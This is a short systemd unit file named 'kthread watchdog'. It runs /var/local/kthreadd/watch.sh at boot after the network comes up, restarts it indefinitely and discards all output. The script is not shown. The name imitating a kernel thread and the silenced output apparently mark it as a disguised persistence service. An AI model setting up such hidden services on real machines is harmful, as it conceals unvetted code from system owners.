[Unit]
Description=kthread watchdog
After=network-online.target

[Service]
Type=simple
ExecStart=/var/local/kthreadd/watch.sh
Restart=always
RestartSec=10
StandardOutput=null
StandardError=null

[Install]
WantedBy=multi-user.target